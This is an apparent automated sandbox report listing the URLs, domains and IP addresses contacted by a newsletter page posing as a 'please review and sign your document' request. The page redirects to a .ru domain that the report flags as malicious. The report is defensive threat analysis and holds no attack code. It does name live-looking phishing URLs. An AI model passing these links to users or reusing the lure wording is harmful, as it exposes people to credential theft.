https://kanes-newsletter-871ead.beehiiv.com/assets/popover-CV1J-FFp.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/recommended_posts?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Frecommended_posts0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/use-is-mounted-BaHv16bB.js0%Avira URL Cloudsafe
https://remix.run/route/hydrate-fallback0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/description-BklOXbF-.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/hidden-KuoXmiN5.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-EzvqLY92.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/keyboard-CaEu2o0u.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/ChevronRightIcon-Dsmk2epM.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-DWIcfCyK.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/disclosure-OT1gpdxK.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/post_insights-l0sNRNKZ.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-BxYGUTX4.js0%Avira URL Cloudsafe
https://ingestion.apiary.beehiiv.net/api/v1/ingestion/pixel0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-BFDoivjB.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/SparklesIcon-DA4hsc2a.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-D5Hq4kiz.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-CCu-G_ty.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/useTranslation-CfKJAmGY.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/dialog-CtpHvvfD.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-DIU-Hrs1.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/LoginWithPasswordAction-TVLpJaLq.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/use-tree-walker-Inv4mdsP.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/useSetLastViewedResource-BelRoKi6.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/manifest-bfc7ba9e.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-BdpAPpdN.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-CJHGmWl4.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/_slug-BPtqEfI0.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/useWebBuilderCommunicator-DoXoLq6Y.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-IxBbnf-Q.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/dayjs.min-B8CfgAhU.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/entry.client-CuBsnk-1.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/LockClosedIcon-BluoCUMI.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-pnFxOaac.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-DTtuIjz-.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-CqJN8iQq.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/root-DEVPAlsu.css0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/StatusInputs-JkVhk_jg.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/PoweredByBeehiiv-BmLCj73J.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/recommended_posts-l0sNRNKZ.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/useIsMobile-onEuuMFV.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-D6da9p6-.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/ChevronDownIcon-CCywpT3m.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/XMarkIcon-Y2tO3Ykg.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/TwitterEmbed-wIDCDAXa.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/useToast-DK42uF07.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/visit_token?_data=routes%2F__actions%2Fvisit_token0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/useSignupRedirects-DpD4LtfX.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/RedirectToHiddenInput-mUb4yii7.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/entry.worker.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js?0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/PageProvider-uKxoiNdl.js0%Avira URL Cloudsafe
https://2u9o.ptisepma.ru/favicon.ico0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/Input-snMSpc3o.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/FreeGatedContent-D-EWr0IZ.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/page_view0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/jsx-runtime-BjG_zV1W.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/XMarkIcon-BIfmjQfr.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/CreateAction-Dl0JjCOR.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/post_insights?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Fpost_insights0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/AppGlobals-2Br-8bZs.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/performance-dfU_ZKaW.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/context-CxfOs_9L.js0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0016.t-0009.t-msedge.net
13.107.246.44
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      sni1gl.wpc.alphacdn.net
      152.199.21.175
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          s-part-0017.t-0009.fb-t-msedge.net
          13.107.253.45
          truefalse
            high
            s-part-0035.t-0009.t-msedge.net
            13.107.246.63
            truefalse
              high
              stk.px-cloud.net
              34.107.199.61
              truefalse
                high
                collector-pxebumdlwe.px-cloud.net
                35.190.10.96
                truefalse
                  high
                  platform.twitter.map.fastly.net
                  146.75.120.157
                  truefalse
                    high
                    syndication.twitter.com
                    104.244.42.136
                    truefalse
                      high
                      s3-w.us-east-1.amazonaws.com
                      3.5.3.19
                      truefalse
                        high
                        kanes-newsletter-871ead.beehiiv.com
                        104.18.69.40
                        truefalse
                          high
                          code.jquery.com
                          151.101.130.137
                          truefalse
                            high
                            inbound-weighted.protechts.net
                            35.190.10.96
                            truefalse
                              high
                              cdnjs.cloudflare.com
                              104.17.24.14
                              truefalse
                                high
                                media.beehiiv.com
                                104.18.68.40
                                truefalse
                                  high
                                  o922922.ingest.us.sentry.io
                                  34.120.195.249
                                  truefalse
                                    high
                                    challenges.cloudflare.com
                                    104.18.95.41
                                    truefalse
                                      high
                                      www.google.com
                                      142.250.185.132
                                      truefalse
                                        high
                                        fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru
                                        188.114.96.3
                                        truefalse
                                          high
                                          stk.hsprotect.net
                                          34.107.199.61
                                          truefalse
                                            high
                                            2u9o.ptisepma.ru
                                            188.114.96.3
                                            truetrue
                                              unknown
                                              embed.bsky.app
                                              13.59.241.142
                                              truefalse
                                                high
                                                www.office.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  msft.hsprotect.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    platform.twitter.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      fpt.live.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        www.tiktok.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          signup.live.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            aadcdn.msftauth.net
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              collector-pxzc5j78di.hsprotect.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                logincdn.msftauth.net
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  client.hsprotect.net
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    client.px-cloud.net
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      identity.nel.measure.office.net
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        lf16-tiktok-web.tiktokcdn-us.com
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          login.microsoftonline.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            beehiiv-adnetwork-production.s3.amazonaws.com
                                                                            unknown
                                                                            unknownfalse
                                                                              high
                                                                              NameMaliciousAntivirus DetectionReputation
                                                                              https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-newsletter-871ead.beehiiv.com&utm_medium=referral&utm_campaign=please-review-and-sign-your-document-belowfalse
                                                                                unknown
                                                                                https://kanes-newsletter-871ead.beehiiv.com/assets/YoutubeIcon-DSouMQiN.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://kanes-newsletter-871ead.beehiiv.com/cdn-cgi/challenge-platform/h/b/jsd/r/9027d88b8fd31902false
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                                                  high
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/bugs-DVQzBh-s.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/recommended_posts?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Frecommended_postsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/index-COqk5b7U.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/popover-CV1J-FFp.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/index-DcpNk-OI.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/use-is-mounted-BaHv16bB.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/Image-ycA_AFLr.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/description-BklOXbF-.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/index-DWIcfCyK.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/hidden-KuoXmiN5.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/ChevronRightIcon-Dsmk2epM.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/index-BxYGUTX4.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/post_insights-l0sNRNKZ.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/index-EzvqLY92.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowfalse
                                                                                    unknown
                                                                                    https://collector-pxzc5j78di.hsprotect.net/api/v2/msftfalse
                                                                                      high
                                                                                      https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                                                                        high
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/keyboard-CaEu2o0u.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/disclosure-OT1gpdxK.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/index-BFDoivjB.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/SparklesIcon-DA4hsc2a.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/index-D5Hq4kiz.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/index-CCu-G_ty.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/useTranslation-CfKJAmGY.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/dialog-CtpHvvfD.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/index-DIU-Hrs1.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/LoginWithPasswordAction-TVLpJaLq.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                          high
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/use-tree-walker-Inv4mdsP.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/useSetLastViewedResource-BelRoKi6.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/index-BdpAPpdN.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/index-CJHGmWl4.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/useWebBuilderCommunicator-DoXoLq6Y.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/manifest-bfc7ba9e.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/_slug-BPtqEfI0.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/dayjs.min-B8CfgAhU.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/index-IxBbnf-Q.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9027d8d7696df5f4/1736964884737/a7a8088edc32fe386ff2e4ee17a0c5c34ef89749f0f9cdd871a41f5a7338b21f/95ZySpz0PrH8eb5false
                                                                                            high
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/entry.client-CuBsnk-1.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/LockClosedIcon-BluoCUMI.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/index-pnFxOaac.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/index-DTtuIjz-.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/index-CqJN8iQq.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/StatusInputs-JkVhk_jg.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/root-DEVPAlsu.cssfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/recommended_posts-l0sNRNKZ.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/PoweredByBeehiiv-BmLCj73J.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/useIsMobile-onEuuMFV.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/index-D6da9p6-.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://o922922.ingest.us.sentry.io/api/4507170453979136/envelope/?sentry_key=35c3cc890abe9dbb51e6e513fcd6bbca&sentry_version=7&sentry_client=sentry.javascript.remix%2F8.9.2false
                                                                                              high
                                                                                              https://kanes-newsletter-871ead.beehiiv.com/assets/ChevronDownIcon-CCywpT3m.jsfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://kanes-newsletter-871ead.beehiiv.com/assets/XMarkIcon-Y2tO3Ykg.jsfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://kanes-newsletter-871ead.beehiiv.com/assets/TwitterEmbed-wIDCDAXa.jsfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://kanes-newsletter-871ead.beehiiv.com/assets/RedirectToHiddenInput-mUb4yii7.jsfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9027d8d7696df5f4&lang=autofalse
                                                                                                high
                                                                                                https://kanes-newsletter-871ead.beehiiv.com/assets/useSignupRedirects-DpD4LtfX.jsfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://a.nel.cloudflare.com/report/v4?s=fuobY%2BkOTRAOMABY%2BiqCVr4e5kwUDEDvQXdPymIg%2BRhlb%2Fg8de%2FgL2ItASG%2FOP8OU2jlF3wKIOVMbJ3crCFSeCSFF1Z4rBwdeN42jPAXBjrM%2Fz36lmhyAS3v%2FtW3eA%3D%3Dfalse
                                                                                                  high
                                                                                                  https://kanes-newsletter-871ead.beehiiv.com/visit_token?_data=routes%2F__actions%2Fvisit_tokenfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://kanes-newsletter-871ead.beehiiv.com/assets/PageProvider-uKxoiNdl.jsfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                                                    high
                                                                                                    https://platform.twitter.com/widgets.jsfalse
                                                                                                      high
                                                                                                      https://kanes-newsletter-871ead.beehiiv.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js?false
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://kanes-newsletter-871ead.beehiiv.com/assets/useToast-DK42uF07.jsfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://kanes-newsletter-871ead.beehiiv.com/entry.worker.jsfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://kanes-newsletter-871ead.beehiiv.com/assets/Input-snMSpc3o.jsfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://stk.hsprotect.net/ns?c=d19b4f80-d36c-11ef-b05e-b3c96211093ffalse
                                                                                                        high
                                                                                                        https://2u9o.ptisepma.ru/favicon.icofalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/FreeGatedContent-D-EWr0IZ.jsfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://kanes-newsletter-871ead.beehiiv.com/page_viewfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/XMarkIcon-BIfmjQfr.jsfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/CreateAction-Dl0JjCOR.jsfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://kanes-newsletter-871ead.beehiiv.com/assets/jsx-runtime-BjG_zV1W.jsfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://syndication.twitter.com/settings?session_id=5014ff864e2c4e055ad43236486b600cbc96bac6false
                                                                                                          high
                                                                                                          https://kanes-newsletter-871ead.beehiiv.com/post_insights?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Fpost_insightsfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/performance-dfU_ZKaW.jsfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://kanes-newsletter-871ead.beehiiv.com/assets/AppGlobals-2Br-8bZs.jsfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.pngfalse
                                                                                                            high
                                                                                                            https://kanes-newsletter-871ead.beehiiv.com/assets/context-CxfOs_9L.jsfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                            https://remix.run/route/hydrate-fallbackchromecache_340.1.dr, chromecache_413.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://client.hsprotect.net/PXzC5j78di/main.min.jschromecache_394.1.drfalse
                                                                                                              high
                                                                                                              https://fpt.live.com/chromecache_380.1.drfalse
                                                                                                                high
                                                                                                                https://raw.githubusercontent.com/stefanpenner/es6-promise/master/LICENSEchromecache_411.1.dr, chromecache_290.1.dr, chromecache_418.1.drfalse
                                                                                                                  high
                                                                                                                  https://embed.bsky.appchromecache_354.1.dr, chromecache_244.1.drfalse
                                                                                                                    high
                                                                                                                    https://connect.facebook.net/en_US/fbevents.jschromecache_358.1.dr, chromecache_224.1.drfalse
                                                                                                                      high
                                                                                                                      https://ingestion.apiary.beehiiv.net/api/v1/ingestion/pixelchromecache_388.1.dr, chromecache_301.1.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://remix.run/guides/errorschromecache_340.1.dr, chromecache_413.1.drfalse
                                                                                                                        high
                                                                                                                        https://react.dev/errors/chromecache_252.1.dr, chromecache_340.1.dr, chromecache_424.1.dr, chromecache_413.1.drfalse
                                                                                                                          high
                                                                                                                          https://www.tiktok.com/embed.jschromecache_283.1.drfalse
                                                                                                                            high
                                                                                                                            https://analytics.tiktok.com/i18n/pixel/events.jschromecache_358.1.dr, chromecache_224.1.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows-ppe.netchromecache_194.1.dr, chromecache_227.1.drfalse
                                                                                                                                high
                                                                                                                                https://beehiiv.com/touchromecache_283.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.beehiiv.com/?utm_source=Kane&#x27;schromecache_283.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://login.microsoftonline.comchromecache_194.1.dr, chromecache_227.1.drfalse
                                                                                                                                      high
                                                                                                                                      http://jedwatson.github.io/classnameschromecache_293.1.dr, chromecache_292.1.dr, chromecache_284.1.dr, chromecache_343.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://media.beehiiv.com/cdn-cgi/image/fit=scale-downchromecache_283.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://remix.run/route/metachromecache_252.1.dr, chromecache_424.1.drfalse
                                                                                                                                            high
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            16.15.184.174
                                                                                                                                            unknownUnited States
                                                                                                                                            unknownunknownfalse
                                                                                                                                            151.101.130.137
                                                                                                                                            code.jquery.comUnited States
                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                            35.190.80.1
                                                                                                                                            a.nel.cloudflare.comUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            104.244.42.136
                                                                                                                                            syndication.twitter.comUnited States
                                                                                                                                            13414TWITTERUSfalse
                                                                                                                                            104.18.95.41
                                                                                                                                            challenges.cloudflare.comUnited States
                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                            239.255.255.250
                                                                                                                                            unknownReserved
                                                                                                                                            unknownunknownfalse
                                                                                                                                            146.75.120.157
                                                                                                                                            platform.twitter.map.fastly.netSweden
                                                                                                                                            30051SCCGOVUSfalse
                                                                                                                                            3.5.3.19
                                                                                                                                            s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                            13.59.241.142
                                                                                                                                            embed.bsky.appUnited States
                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                            35.190.10.96
                                                                                                                                            collector-pxebumdlwe.px-cloud.netUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            18.220.176.90
                                                                                                                                            unknownUnited States
                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                            104.18.68.40
                                                                                                                                            media.beehiiv.comUnited States
                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                            34.107.199.61
                                                                                                                                            stk.px-cloud.netUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            104.17.24.14
                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                            142.250.185.132
                                                                                                                                            www.google.comUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            151.101.2.137
                                                                                                                                            unknownUnited States
                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                            188.114.96.3
                                                                                                                                            fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ruEuropean Union
                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                            104.18.69.40
                                                                                                                                            kanes-newsletter-871ead.beehiiv.comUnited States
                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                            34.120.195.249
                                                                                                                                            o922922.ingest.us.sentry.ioUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            IP
                                                                                                                                            192.168.2.16
                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                            Analysis ID:1592109
                                                                                                                                            Start date and time:2025-01-15 19:13:56 +01:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 4m 19s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                            Sample URL:https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Number of analysed new started processes analysed:13
